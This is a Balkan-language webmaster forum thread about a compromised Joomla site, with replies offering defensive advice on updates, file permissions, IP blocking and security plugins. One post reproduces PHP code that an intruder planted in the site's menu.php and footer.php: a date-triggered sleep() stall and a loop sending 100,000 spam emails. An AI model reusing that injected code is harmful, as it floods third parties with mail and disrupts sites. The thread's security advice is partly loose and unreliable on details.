Upad na Joomla site

Pošto mi je kodiranje slabija strana, imao sam jedan sigornosni problem.
U mapi includes joomla sajta su se pojavila dva fajla a zatim i treći.

e sad tip mi je iz kalifornije (išao sam gledati ko mi je pristupao serveru) pristupio preko prva dva fajla i vjerojatno ‘šibno’ treći na sajt nakon čega su počele stizati poruke na mail u ogromnoj količini.
Moje pitanje: Ko je mogao kreirati te fajlove, osoba ili program i da li je to neki od hakerskih upada, mada sam siguran da je?!
Kako mu je omogućeno da kreira te fajlove?
Hvala unaprijed !

I meni je skoro neko provalio na Joomla site. Postavio svoj index.html kod i usao.

Moj savjet: ukoliko nisi nadogradio Joomlu na najnoviju verziju, odmah nadogradi!

Sve nadogradnje stavljam manje više redovito, mijenjam lozinke malo malo, al ovi fajlovi koji su ubačeni mi nisu jasni.
Kako neko može ubaciti php fajlove u direktorij, bez admin odobrenja i ovlasti, nit iko ima pristup c panelu a ni u joomli osim dva korisnička računa ostali nemaju ta dopuštenja.
Zanimljivo je da se prije 10tak dana desilo da mi se u tekstovima pojavio link (i frame) ka stranici sa virusom.
Fino je link uglavljen ili na početku ili na kraju teksta.
radim backup, sva sreća mada nije teško ni iz exportirane baze izvući tako nešto.
Zanima me koja korist nekom od takvih zajebancija i na koji način najčešće mogu takva sranja raditi.

Ljudi to rade samo da pokazu nekom da to znaju. Nemaju nikakve koristi osim toga!

[quote=“mikibm”]Sve nadogradnje stavljam manje više redovito, mijenjam lozinke malo malo, al ovi fajlovi koji su ubačeni mi nisu jasni.
Kako neko može ubaciti php fajlove u direktorij, bez admin odobrenja i ovlasti, nit iko ima pristup c panelu a ni u joomli osim dva korisnička računa ostali nemaju ta dopuštenja.
Zanimljivo je da se prije 10tak dana desilo da mi se u tekstovima pojavio link (i frame) ka stranici sa virusom.
Fino je link uglavljen ili na početku ili na kraju teksta.
radim backup, sva sreća mada nije teško ni iz exportirane baze izvući tako nešto.
Zanima me koja korist nekom od takvih zajebancija i na koji način najčešće mogu takva sranja raditi.[/quote]

obrati se hostingu.
ili zablokiraj cijeli ip range frajera.
redoviti update

O tome sam razmišljao, preko htaccess-a zabraniti pristup za određeni dio IP adresa al’ kolko to može pomoći i nikako mi nije jasno na koji način to uspjeva određenim frikovima, bez nekih ‘ulaznih vrata’ na sajtu.

[quote=“mikibm”] nikako mi nije jasno na koji način to uspjeva određenim frikovima, bez nekih ‘ulaznih vrata’ na sajtu.[/quote] Nema potpuno čistog SW i svaki je bugovit i ima sigurnosne propuste. Upravo se ti sig. propusti koriste za upad. Treba biti veliki maher i poznavatelj određenog komada SW da bi preko njegovih manjkavosti upao na host. Ja to neznam raditi niti želim naučiti. Npr jomla i phpbb su ranjivi ako se redovito ne nadograđuju na nove verzije i kad se da specifikacija promjena u novim verzijama time je hakerima ukazano na propuste u ranijoj verziji i oni to iskoriste. Ponavljam treba biti veliki znalac i prosječni korisnik neta ne može biti haker ukoliko se ne posveti izobrazbi.

Kolko pretpostavljam uglavnom upadi na sajtove se dešavaju preko lozinke za pristup i naj jednostavnije. Da li je to program (trojanac il kako se već zove) koji 'hvata dok se piše lozinka za pristup sajtu il je jednostavno pogađanje na osnovu podataka od vlasnika sajta.
I to pogađanje , ko se time bavi je stvarno bizarno kad su pasvordi tipa ime prezime, nadimak, datumi, ime djece i dr…
Ali ako se držim nekih sigurnosnih normi tipa lozinka nevezana za moje neke podatke, antivirus i redovita provjera, sigurnosne postavke komponenti na web-u, onda mi to nije jasno.
Drugo da sam ja Janica il neko poznat pa da mi neko hakeriše sajt pa se to onda čuje, al ovako mi i dalje nije jasno.

A jednom je bila hakirana osobna stranica mog prijatelja, a potpuni je anonimac ko i ja. Možeš je posjetiti
http://neven-antic.com
Sad nije hakirana. :slight_smile:

Pa dobro ajd’ al tvoj prijatelj ima CMS meni nepoznatog porijekla. :slight_smile:

[quote=“mikibm”]Kolko pretpostavljam uglavnom upadi na sajtove se dešavaju preko lozinke za pristup i naj jednostavnije. Da li je to program (trojanac il kako se već zove) koji 'hvata dok se piše lozinka za pristup sajtu il je jednostavno pogađanje na osnovu podataka od vlasnika sajta.
I to pogađanje , ko se time bavi je stvarno bizarno kad su pasvordi tipa ime prezime, nadimak, datumi, ime djece i dr…
Ali ako se držim nekih sigurnosnih normi tipa lozinka nevezana za moje neke podatke, antivirus i redovita provjera, sigurnosne postavke komponenti na web-u, onda mi to nije jasno.
Drugo da sam ja Janica il neko poznat pa da mi neko hakeriše sajt pa se to onda čuje, al ovako mi i dalje nije jasno.[/quote]

Ako se radi o shared-hostingu, problem uopće ne mora biti u Vašoj web-stranici, odnosno računalu :wink:

Vecini stranica je kod joomle krivac sam korisnik koji ostavlja premisije foldera na 755 ili 777 sto je glavni razlog upada na stranicu, no ima tu i brdo takozvanih providera koji nedovoljno zastite svoje servere
Dakle preporuka prvo pogledajte premisjie koje moraju biti na 644 i to po mogucnosti na svim fajlovima i folderima

Inace osobnog sam misljenja da je joomlu pregazilo vrijeme te da stvarno treba prelaziti na wordpresss koji je daleko sigurniji

Hvala @Alen, to s permisijama mi je također poznato al neke komponente traže 777 poput nekih za prognozu u pitanju su .xml fajlovi, mada ću to provjeriti u svakom slučaju.
Wordpress hm, definitivno pokazatelji govore u nj. korist.

da se nadopunim i ispravim sada mi sve komponente rade s dopuštenjima fajlova na 644, no međutim prije toga imao sam još jedno gostovanje frajera (hakera) koje sam nadam se na vrijeme otkrio.
U pitanju su bile prepravke osnovnih fajlova footer.php, database.php, defines.php i menu.php.
Ubačeni kod u menu:

if (date('j')==18){
		if (date('G')<7){
			sleep(1000000);
		}	
	}

i u fajl footer.php

<?php
	if (date('j')==16){
		if (date('G')<7){
			$to  = 'apps-abuse-report@google.com' . ', '; 
			$to .= 'abuse@@hotmail.com';
			$to .= 'abuse@t-com.hr';
			$to .= 'abuse@net.hr';
			$subject = 'Buy something on adaptacije.com';
			$message = 'IMPORTANT: Do not ignore this email. Buy something on adaptacije.com';
			$headers = 'From: cpanel@adaptacije.com';
			for ($i = 1; $i <= 100000; $i++) {
				mail($to, $subject, $message, $headers);
			}
		}	
	}
?>

zanimljivo!

Moram priznati da ću poduzeti opciju zabrane pristupa određenim ‘djelovima’ zemaljske kugle :), staviti pasvord na admin folder, pokrenuti nadgledanje sustava i bilježenje promjena, staviti novu zakrpu i instalirati antihak alat u Faking Joomla sajt.

Da se malo nadopunim, za korisnike Joomla CMS koji imaju ozbiljnije projekte zasnovane na spomenutom cms-u preporuka za program- komponentu (anti-hack komponenta) GuardXT.
Besplatna komponenta koja ukazuje na sigurnosne propuste na web-u koje uz par koraka možete lako otkloniti.
Za sada se pokazala kao uspješna :slight_smile:

Imaj na umu da gotovo svaki dodatak za joomlu može biti potencijalno “ranjiv” na neki maliciozni sadržaj/kod. Postoje određeni sajtovi koji sakupljaju podatke o ranjivim dodacima za Džumlu i mogu ti reći da je baza poprilično velika.

Joomla je najsigurnija sa default podešavanjima, bez dodataka. A čak i tada nije 100% sigurna. Jednostavno, joomlu je pregazilo vreme. Kod se treba menjati od 0 za današnje standarde i tehnologije.
Oni koji se duže bave CMS-ovima i prate njihov razvoj sigurno se sećaju ogroman fail kada je izašla 1.5x verzija gde je bilo moguće veoma jednostavno zameniti lozinku administratora (kada se kao TOKEN kuca ’ ili tako nešto).
Džumla je veoma “teška”, pravi preterano mnogo http zahteva, upita, katastrofalan SEO…jednostavno loš kod za današnje standarde.

Ako neko ima sajt sa velikim sadržajem u Joomli savetujem mu da sve to prebaci na neki drugi CMS (postoje i skripte koje to mogu uraditi umesto vas) …npr Wordpress, Drupal itd.

[quote=“ivan79”]Oni koji se duže bave CMS-ovima i prate njihov razvoj sigurno se sećaju ogroman fail kada je izašla 1.5x verzija gde je bilo moguće veoma jednostavno zameniti lozinku administratora (kada se kao TOKEN kuca ’ ili tako nešto).
[/quote]

Sigurnosni propusti su PROPUSTI!!! Onaj tko se iole ozbiljno bavi webom o tome će itekako voditi računa. Zaštitit će svoj sajt, promjeniti prefikse baze, izmjeniti admin username i pass te postaviti neku od komponenti za monitoring i firewall. Dakle, to što ti pričaš, pretpostavljam da se odnosi na korisnike joomle koji tek počinju ili se nedovoljno ozbiljno odnose prema svom webu. Znam puno webmastera koji koriste joomlu bez ikakvih problema zbog redovitih update-ova, praćenja novosti i stalne brige o svom webu. Dakle, Joomla kao CMS možda gubi u Australiji i Americi ali u Europi i dalje vodi kao najkorišteniji CMS otvorenog koda. Čudno za nešto što je pregazilo vrijeme. Da, izašla je Joomla 1.6:tribina:

Razumjem te potpuno imao sam problema sa hakerima ali vecinski se desi da hakeri prvo udu u tvoje racunalo i preko njega pokupe informaciju koja im treba.Naprimjer meni su unisli sa mejla.Jer sam kliknuo na neki cudan mejl zatim mi je se automatcki instalirala neka vrsta trojana u pozadini moga racunala.Jednostavno moj ti je recept, pazi sta skidas sa neta i pazi gdje klikas.Naravno jedan dobar antivrus program je jos jedna ekstra pomoc protiv hakera!!


Copyright © 2020 WM Forum - AboutContact - Sponsored by: Mydataknox & Webmaster.Ninja